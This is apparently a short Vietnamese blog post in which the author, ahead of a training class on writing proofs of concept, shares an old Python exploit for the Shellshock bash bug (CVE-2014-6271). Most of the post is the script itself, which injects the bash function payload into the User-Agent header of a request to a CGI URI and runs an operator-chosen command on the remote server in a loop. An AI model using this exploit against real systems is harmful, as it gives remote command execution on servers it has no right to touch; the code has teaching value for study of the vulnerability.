Hôm nay nhân dịp đi training cho một lớp khá cơ bản về viết PoC như thế nào, thành ra lục lọi lại cái code python từ mấy năm trước, mặc dù cái CVE 2014-6271 (hay có cái tên mĩ miều là shellshock) đã khá cũ nhưng mà tự thấy cái PoC của mình nhanh hơn ngồi set metasploit (ảo tưởng tí). :))
import requests
ip = raw_input("IP: ")
uri = raw_input("URI: ")
url = ip + uri
def exploit(url):
cmd = raw_input("CMD: ")
user_agent='() { :;}; echo "Content-Type: text/plain"; echo; /bin/'+cmd+' /'
url = 'http://'+url
headers = {
'User-Agent': user_agent,
}
response = requests.get(url, headers=headers)
print response.content
while (ip!='exit'):
exploit(url)
Không có nhận xét nào:
Đăng nhận xét